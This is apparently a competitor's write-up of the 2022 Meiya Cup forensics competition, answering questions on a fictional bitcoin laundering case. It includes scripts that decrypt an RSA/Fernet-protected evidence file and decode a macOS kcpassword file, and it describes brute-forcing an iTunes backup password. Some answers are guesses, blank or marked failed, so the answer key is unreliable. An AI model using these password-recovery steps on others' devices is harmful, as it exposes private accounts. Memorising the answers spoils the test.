95. [填空题]根据装置的过往记录,'log_file' 是设在 'usr/rooney/' 的哪个已被删除的子文件夹里 (Sub Directory)? (以大写英文回答) (3分)

这里已经是损失的文件了 所以我们去扇区中进行查找

这里的文件夹就是 RECORD

106

106. [单选题]朗尼的计算机有什么软件可以创建比特币钱包 (Bitcoin Wallet)? (1分)

A. MetaMask

B. Electrum

C. Trezor

D. 以上皆非

这里问计算机了 所以我们去取证计算机 有点大 的

2022美亚杯团队赛_第102张图片

然后我们去查看下载 发现用户下载了这个

107

107. [填空题]朗尼通过比特币替王景浩清洗黑钱,分析朗尼的计算机及手机,朗尼收取王景浩黑钱的比特币地址 (Bitcoin Address) 是什么? (以大写英文及阿拉伯数字回答) (1分)

 这里看到收取黑钱,那么肯定是有交流 我们先去看看他们交流的地方

我们去取证手机

2022美亚杯团队赛_第103张图片

108

108. [单选题]朗尼收取王景浩多少比特币作为清洗黑钱的费用? (1分)

 10%

109 回复种子--->比特币关键词

109. [单选题]朗尼的计算机里有一个没被加密的比特币钱包,它的回复种子 (Recovery Seed) 不包含哪一个英文字? (1分)

A. oppose

B. area

C. twice

D. roast

2022美亚杯团队赛_第104张图片

选D

110

110. [单选题]朗尼的计算机里有多少个加密了 (Encrypted) 的比特币钱包? (1分)
A. 1

B. 2

C. 3

D. 4

E. 5

除了 rc其他都被加密了

E

111

111. [单选题]朗尼将加密了的比特币钱包的密码存在他计算机的一个档案里,这个档案的副档名是什么? (以大写英文及阿拉伯数字回答) (3分)

A. DMG

B. PDF

C. ASD

D. ZIP

E. PNG

2022美亚杯团队赛_第105张图片

这里就asd可以看到有奇怪的 我们看看

2022美亚杯团队赛_第106张图片

看到了账号密码

C

112

112.[单选题] 朗尼在手机里有一个加密了的比特币钱包,他采用什么应用程序把该钱包里的黑钱转换成另一种加密货币? (2分)

A. Safepal

B. Metamask

C. Changelly

D. Opensea

这里其实我们知道了 是通过NFT 卖出 然后洗钱 所以这里选D

还有一个去翻手机相册

2022美亚杯团队赛_第107张图片

113

113. [单选题]承上题,这次转换加密货币的日期和时间是什么? (以时区UTC+8回答) (2分)

A. 2022-10-07 10:29时

B. 2022-10-07 11:06时

C. 2022-10-07 11:07时

D. 2022-10-07 13:54时

 我们继续看相册

 2022美亚杯团队赛_第108张图片

A

114

114. [单选题]朗尼在计算机里采用什么浏览器 (Browser) 及在什么日期时间在他的计算机安装 'MetaMask' ? (以时区UTC+8回答) (1分)

A. Chrome 2022-08-25 12:35时

B. Chrome 2022-10-07 14:29时

C. Firefox 2022-08-25 12:35时

D. Firefox 2022-10-07 14:29时

我们看看默认浏览器

2022美亚杯团队赛_第109张图片

发现是chrome 然后我们去看看 metamask

2022美亚杯团队赛_第110张图片

根据url信息 然后通过查询 路径可以发现存在

2022美亚杯团队赛_第111张图片

时间是 10-6 选B

115

115. [单选题]朗尼在计算机里所创建的非同质化通证 (Non-Fungible Token - NFT) 使用哪一个种区块链 (Blockchain) 技术? (1分)

A. Ethereum

B. Polygon

C. Solana

D. Arbitrum

E. Klaytn

这里电脑其实是找不到的

A

116

116.[单选题] 朗尼在什么日期时间把计算机中创建的非同质化通证 (NFT) 放售? (以时区UTC+8回答) (2分)

A. 2022-10-07 14:47时

B. 2022-10-07 14:49时

C. 2022-10-07 14:52时

D. 2022-10-07 14:54时

首先可以搜索opensea 因为我们在前一题搜索NTF的时候有看到  所以我们就可以看看opensea

2022美亚杯团队赛_第112张图片

这里我们可以看到是good luck的这个 然后我们看看具体时间 但是看wp是说是 A

是 create的那个

117

117. [多选题]朗尼的手机里,有什么应用程序与将黑钱 (比特币) 转换成另一加密货币的地址有关? (2分)

A. Metamask

B. Opensea

C. Safepal

D. YouTube

然后这里发现了 是 B 但是其他也都可以收到 所以我觉得是 ABC

118

118. [单选题]朗尼的手机里,于2022-10-07,15:07时至15:08时做过什么动作? (以时区UTC+8回答) (2分)

A. 登录 'Metamask'

B. 登录 'Opensea'

C. 屏幕截图 (Screen Capture)

D. 登录 'YouTube'

 2022美亚杯团队赛_第113张图片

先去看看最简单的 屏幕截图 只有10个 看完就出答案了 C

119

119. [多选题]承上题,从这个动作中能找到什么资讯? (1分)

A. Opensea.io

B. Ethereum Main Network

C. Your purchase is complete

D. Subtotal = 0.0253 ETH

E. Good Luck

 D

 120

120. [填空题]在朗尼的计算机旁找到 'MetaMask' 的密码是 'opensea741',找出朗尼计算机里的 'MetaMask' 中有多少加密货币余额? (不要输入 '.',以阿拉伯数字回答,如 0.137 需回答 0137) (2分)

2022美亚杯团队赛_第114张图片

00247

121

121.朗尼的计算机曾用什么电邮地址登录电邮帐号? (不要输入答案中的 '@' 及 '.',以大写英文及阿拉伯数字回答,如 [email protected],需回答 NAMEMAILCOM)

这里邮箱 显示 @

2022美亚杯团队赛_第115张图片

122

127 什么电邮账号曾接收过上述电邮地址发送的电邮?(不要输入答案 中的 '@' 及 '.',以大写英文及阿拉伯数字回答,如[email protected],需回 答 NAMEMAILCOM

123

123. [多选题]承上题,上述的电邮附件包含哪些类型的档案? (3分)

124

124. [填空题]上述电邮附件里的文件,被遮蔽的英文单字是什么? (以大写英文回答) (3分)

126

125. [填空题]根据上述电邮附件里找到的回复种子 (Recovery Seed),计算朗尼在 'MetaMask' 使用的以太币 (Ethereum) 地址。(提示:BIP-44 derivation path = m/44'/60'/0'/0/0) (以大写英文及阿拉伯数字回答) (3分)

127

127. [单选题]朗尼通过手机相约王景浩于10月15日到哪一个地区食晚饭? (1分)

A. 荃湾

B. 湾仔

C. 九龙城

D. 九龙塘

2022美亚杯团队赛_第116张图片

A

128

128. [填空题]朗尼手机的 'WhatsApp' 号码是什么? ( 号码 ) @s.whatsapp.net? (以阿拉伯数字回答) 85259814785(1分)

 85259814785

129

129. [多选题]朗尼的手机曾连接以下哪一个WIFI网络? (2分)
A. taiiphone

B. rooneyhome

C. Function Room

D. TP-Link

 AC

130

130. [单选题]朗尼的手机曾连接WIFI [SSID: faifai], 它的登录密码是什么 ? (2分)

A. abcd5678

B. aaaa0000

C. rooney111

D. rdfu1234

 D

王景浩

17

17. [单选题]王景浩的USB记忆棒里有一个 'Data' 文件夹 (Folder),它存有哪一种类型的密钥文件? (1分)

A. pem

B. cer

C. crt

D. key

E. 以上皆非

刚刚拿到usb我也傻了 要怎么取证呢 想到直接挂载不就好了

2022美亚杯团队赛_第117张图片

2022美亚杯团队赛_第118张图片

这里可以看到 key保存为 PEM类型 所以选E

18

18. 承上题,‘Data’文件夹里有一个被加密了的档案,它是被哪一种类型的密钥文件?
A. Symmetric

B. PGP

C. Twofish

D. RSA

E. Triple DES

这里 我们已经知道了是D 但是这里还要注意 其还使用了一个Ferent

我们可以去搜搜看看这是什么加密

2022美亚杯团队赛_第119张图片

还有A

19  通过加密算法进行解密

19. 承上题,被加密的档案属于哪一个类型(File type)¶

A:exe; B:ods; C:rtf; D:sql; E:以上皆非

这里我们需要通过编写 解密脚本实现

from cryptography.fernet import Fernet
import rsa

with open('P1','rb') as h:
    K = rsa.PrivateKey.load_pkcs1(h.read())

with open('minecraft.exe','rb') as ef:
    encrypt_key = ef.read(128)
    encrypt_word = ef.read()

decrypted_key = rsa.decrypt(encrypt_key, K)
cipher = Fernet(decrypted_key)
decrypted_word = cipher.decrypt(encrypt_word)

with open('1.txt','wb') as f:
    f.write(decrypted_word)

2022美亚杯团队赛_第120张图片

发现是数据库 所以是.sql

D

20

20. [多选题]承上题,找出以下哪一个名字出现在该档案里? (3分)

A. Armand To

B. Adam Smasher

C. Beverly Kot

D. Huma Chan

E. 以上皆非

2022美亚杯团队赛_第121张图片

AC

57 MAC取证

57. [单选题]王景浩的计算机使用什么文件系统 (File System) ? (1分)

A. exFAT

B. APFS

C. HFS

D. HFS+

这里需要去取证计算机系统 这里我们能发现是MAC 我们去搜一下 貌似可能是B 但是取证一下看看

2022美亚杯团队赛_第122张图片 这里是hfsp

不知道是什么 然后我们去看看取证大师

D

58

58. [单选题]王景浩计算机的操作系统 (Operating System) 版本是什么? (1分)
A. 10.4.11

B. 10.9.5

C. 10.10.5

D. 10.11.6

2022美亚杯团队赛_第123张图片

D

59

59. [填空题]王景浩的计算机当前有多少个用户 (包括访客 'Guest' )? (以阿拉伯数字回答) (1分)

2022美亚杯团队赛_第124张图片

之前去看 怎么会有 90个 然后发现 其实系统也算在里面

所以我们筛选出前面没有_的 6个

60

60. [填空题]王景浩的计算机里有一个用户被删除,被删除的用户名称是什么? (以大写英文回答) (1分)

这里貌似火眼看不了 我们去取证大师看

BROTHER

61

61. 王景浩的计算机有多少个 '聚焦' 的搜索记録 (Spotlight Search) ?¶

这里我没咋明白 主要就是去搜 Spotlight

2022美亚杯团队赛_第125张图片

9

62

62. 当用户设置了自动登录 (Auto Login) 后,王景浩计算机的操作系统会产生哪个档案?
A. manifest.plist

B. info.plist

C. PasswordPanel.strings

D. kcpassword

https://www.cnblogs.com/zhwer/p/15263277.html

D

63  解密MA密码

63. 王景浩计算机的登录密码 (Login Password) 是什么?¶

A. 1qa@WS3ed B. 3ed$RF5tg C. 5tg^YH7uj D. 2ws$RF6yh`

这里我们要顺着上一题 既然这里要配置 那么就肯定写在里面了 我们去看看

 xway yyds 直接把镜像拖进去就可以了

2022美亚杯团队赛_第126张图片

直接就解析出来了D

这里附上大佬的脚本

#key是固定的值
key = [125, 137, 82, 35, 210, 188, 221, 234, 163, 185, 31]
length = len(key)
#pwd是kcpassword文件中的16进制值的10进制
pwd = [79, 254, 33, 7, 128, 250, 235, 147, 203, 185, 120, 187]
end = False
kcpassword = []
for i in range(len(pwd)):
    if pwd[i] ^ key[i % length] == 0:
        end = True
    if end == False:
        kcpassword.append(str(chr(pwd[i] ^ key[i % length])))

print(''.join(map(str, kcpassword)))

 64

64. 在王景浩的计算机里,他最后使用哪个电邮地址登录 'iCloud' 账号?

这里需要去看登入icloud账号 我们去看看 要么就是通过 网站 要么就是通过app

2022美亚杯团队赛_第127张图片

然后我们搜索icloud 发现邮箱中存在信息 这里是说明是这个邮箱登入了 icloud web 服务

[email protected]

2022美亚杯团队赛_第128张图片

火眼可以直接取证出来

65  通过 manifest.plist 查看版本

65. 王景浩计算机里的手机备份 (iTunes Backup) 包含哪些iOS版本?
A. 12.5.6

B. 15.4

C. 15.5

D. 16.0.3

这里貌似取证大师取出来了

2022美亚杯团队赛_第129张图片

这里可以去学习看文件 我们去源文件中的manifest文件查看

可以发现存在C

AC

66

66. [填空题]王景浩曾经将一台 iPhone 6 连接他的计算机,请问它最后的连接时间是什么? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)

2022美亚杯团队赛_第130张图片

通过蓝牙链接的话是这个 但是如果通过 airdrop

2022美亚杯团队赛_第131张图片

67 查看备份密码

67. 苹果手机备份的密码 (iTunes Backup Encryption Password) 会记录在什么档案?
A. Info.plist

B. privacy.json

C. Manifest.plist

D. PasswordPanel.strings

这里可以知道 manifest是 苹果文件的存储信息

68

68. 以下哪种工具可以用作破解密码?¶

A. Passware B. John The Ripper C. HashCat D. Password Recovery Toolkit

这里都可以进行密码爆破

69  hashcat 爆破itunes backup的参数

69. [多选题]通过 'hashcat' 破解 'iTunes Backup' 密码需要制订一个 'txt' 档案,若该备份的手机iOS版本是10以上,需要按照下列哪个提示字符 (String) 的数据去制订这个 'txt' 档案? (3分)
A. WPKY

B. ITER

C. SALT

D. DPIC

E. DPSL
    Less then iOS 10:

        $itunes_backup$******

    iOS 10 or later:
        $itunes_backup$******

ABCDE

70   passware爆破密码

70. [填空题]王景浩采用了4位数字加密了他的iPhone XR的备份,分析它的密码是什么? (以阿拉伯数字回答) (3分)

这个还是很简单的

直接指定4位密码爆破即可

2022美亚杯团队赛_第132张图片

2022

71 查看3D打印内容

71. 最后一次连上王景浩计算机的3D打印机的IP地址是什么?

我们看看3D打印 有可能是蓝牙吧

2022美亚杯团队赛_第133张图片

结果是wifi 然后我们去看时间

然后我们去看看访问 的ip 3d打印的web地址

2022美亚杯团队赛_第134张图片

1014140

72

72. 3D打印机最后一次在王景浩的计算机尝试打印的时间?

这不就是最后一次链接wifi的时间吗 那么就是上题那个了

73  3D打印的文档问题

73. [单选题]最后一次经由王景浩计算机打印的3D图档案名字是什么? (2分)

A. CE3_balljoint_extender.gcode

B. um3-penguin-real-mini-keychain-merged-tpu.gcode

C. CE3_Prancer.gcode

D. CE3_2020-psu-atx-mount.gcode

2022美亚杯团队赛_第135张图片

3D 打印需要通过文档打印 我们查看最近访问的文档 发现是D

74

74. [单选题]王景浩计算机的Safari浏览器的默认搜索引擎 (Default Search Engine) 是什么? (2分)

A. 百度

B. 谷歌

C. 360

D. Safari

这里貌似都是通过大多数是什么来判断的 这里都是google 所以选B

75

75. [单选题]分析王景浩计算机的数据,王景浩的比特币钱包 (Bitcoin Wallet) 地址是什么? (2分)

A. bc1quw… ...zpzjzt

B. bc1qm… ...5f7n9g

C. bc1q79… ...h4sq52

D. bc1qsl… ...je7hkk

这里开始到比特币了 我们查看一下内容 发现邮箱里存在 交流

2022美亚杯团队赛_第136张图片

A

76

76. [单选题]AGC公司员工 'Carson' 有一个由公司发给他的电邮账户,分析王景浩的计算机数据并找出 'Carson' 的电邮账户密码。(2分)

A. AGC2020@pw

B. AGC2012@PW

C. AGC2020@hkg

D. AGC2021@PW

2022美亚杯团队赛_第137张图片

A

77  查看 messageid

77. [填空题]王景浩曾经冒充AGC公司员工 'Carson' 发送电邮给AGC 客户,这封电邮的 'Message-ID' 是什么? 回答它的首8位数值。(以大写英文和阿拉伯数字回答,如 4GEF90GD) (2分)

2022美亚杯团队赛_第138张图片

之前我们可以看到是修改然后勒索 所以这里就是 勒索的这个 004001d8

78

78. 王景浩采用计算机里的哪种工具进入和盗取AGC公司的数据?

A. Teamviewer

B. OpenVPN

C. Remote Desktop Manager

D. Tor Browser

存在 teamviewer  就是远控软件

然后通过 取证大师看 就可以获取到 tor

79

79. [多选题]王景浩在AGC公司盗取了下列什么类型的档案? (2分)

A. ost

B. xlsx

C. jpg

D. docx

这里需要去公司的pc中查看 传输内容

AB

80 查看open 获取ip地址

80. [填空题]王景浩的计算机于2022年9月29日曾经接上一个虚拟专用网络 (Virtual Private Network - VPN),这个VPN的IP地址是什么? (不要输入答案中的 '.',以阿拉伯数字回答) (2分)

2022美亚杯团队赛_第139张图片

81 配置蓝牙访问mac地址

81. 装置 '「KingHoo」的iPhone' 的蓝牙媒体访问控制地址 (MAC Address) 是什么?

54-2b-8d-c8-8a-a7

82

82. [单选题]王景浩何时将 '小宝' 加为iPhone XR的手机联络人 (Contact) ? (以时区UTC +8回答) (1分)

导出XR 取证

2022美亚杯团队赛_第140张图片

83 挂载备份文件

83. 王景浩的iPhone XR显示他的汇丰银行户口于2022年9月19日收到 多少存款?
A. HKD298.8

B. HKD344.7

C. HKD396

D. HKD543

E. HKD465.1

这里是查看短信 但是我这边没有取证出来 不知道为什么 哦 取错了@_@

2022美亚杯团队赛_第141张图片

B

84

84. [单选题]王景浩的iPhone XR没有收藏 (Bookmark) 哪家音响品牌的网页? (1分)

A. KEF

B. EDIFIER

C. BOSE

D. YAMAHA

E. Bowers & Wilkins

我们去看看收藏?

2022美亚杯团队赛_第142张图片

最后是在书签这里找到了

D

85

85. [单选题]王景浩的iPhone XR手机记录了他曾于2022年8月26日试飞无人机,当天试飞的地点在哪里? (2分)

A. 大埔海滨

B. 启德

C. 数码港

D. 西环

E. 将军澳

这里地址 我们看看是不是iphone记录的

2022美亚杯团队赛_第143张图片

直接通过火眼的定位可以访问到了

D

86  大疆飞行日志分析

86. 王景浩于2022年8月26日试飞无人机的总飞行时间 (Total Flight Time) 多久?

这里我们还需要通过物联大师来实现取证

因为无人机通过苹果手机记录 肯定就有 时间的

2022美亚杯团队赛_第144张图片

找到了 大疆无人机 我们看看能不能导出访问

2022美亚杯团队赛_第145张图片

87

87. [多选题]王景浩用 iPhone XR 拍了一张照片'IMG_0012.HEIC',那照片什么地方曾被修改? (3分)

A. 拍摄时间

B. 经纬度

C. 时区

D. 档案名称

E. 拍摄装备

 这里有点蒙蔽 不知道怎么弄

88

承上题,那张照片修改后的经纬度是什么

96 计算存储容量

96. [填空题] 王景浩 SD 记忆卡 (SD Memory Card) 的储存容量有多少个字节 (Byte) ? (以阿拉伯数字回答) (1分)

这里是取证sd卡

2022美亚杯团队赛_第146张图片

97

97. [单选题] 检视记忆卡上硬盘分区表 (Partition Table) 资讯,记忆卡共有多少个分区 (Partition) ? (1分)

2

98 查看磁盘标识符

98. [单选题] 检视记忆卡上硬盘分区表资讯,第二个分区的分区代码 (Partition Code) 是什么? (1分)

A. 07

B. AF

C. 0C

D. 2B

E. 01

FTK挂载 然后通过 分区助手查看即可

2022美亚杯团队赛_第147张图片

99

99. [多选题] 记忆卡的档案不能被读取,记忆卡受损的原因包括? (2分)

A. 目录项结构 (Directory Entry) 受损

B. 启动扇区表 (Master Boot Record) 受损

C. 文件分配表 (File Allocation Table - FAT) 受损

D. 引导扇区 (Boot Sector) 受损

E. 以上各项皆是

百度搜

AB

100 修复sd卡

100 承上题, 通过分析及手动恢复还原, 记忆卡里有多少个受损的情况出现?

首先这里了解一下

2022美亚杯团体赛 - XDforensics-Wiki

首先 分区正常识别了   MBR就没有受损

但是第二分区的内容无法识别 所以应该是第二分区的 DBR受损

现在我们知道了是第二分区的 DBR受损了

所以我们开始修复 定位到 第二分区

2022美亚杯团队赛_第148张图片

然后我们去搜 5553这个段 发现存在 8个

然后我们可以通过恢复大师 一次性直接恢复了

101

101.[多选题] 记忆卡第一个文件系统 (File System) 中有一个图片档案,它的SHA-256哈希值是 ‘F7E003781456D2E01CFE0EB46988D5BB433ADF9841164BBB90BAC67C0C9B21AF’。该档案显示了哪些影像? (2分)

A. 人

B. 山

C. 汽车

D. 交通灯

E. 天空

然后这里发现了 其实是盘古石也可以直接获取 sd修复后的 但是这个通过sha256获取值 貌似比较难

这道题确实无法实现 ,不修复镜像的话做不了。。。

102

102.[单选题] 检视记忆卡的数据,在2022年10月9日约中午12时5分至12时15分之间的录像 (Video) 中,曾经出现哪一个IP地址? (2分)

A. 61.238.217.108

B. 155.137.190.123

C. 192.168.1.66

D. 185.200.100.242

E. 213.104.156.111

 我们去看看 我们看这个时间里的内容        

2022美亚杯团队赛_第149张图片

D

103

103.[填空题] 恢复还原后的记忆卡中,第二个文件系统显示有多少个空闲簇 (Free Cluster)? (以阿拉伯数字回答) (2分)

 取不出来 失败

104

104.[填空题] 记忆卡第一个文件系统中有一个视频档,它的SHA-256哈希值是 ‘847E1E5FEF64B49C8D689DC3537D619B87666619A7C1EF0CC821153641847C19’,这个视频的档数据存在文件系统 (File System) 的最后的簇号 (Last Cluster Number) 是什么?352

 失败咯

105

105 经过手动恢复还原后记忆卡的 SHA-256 哈希值是什么?

 

你可能感兴趣的:(取证,取证)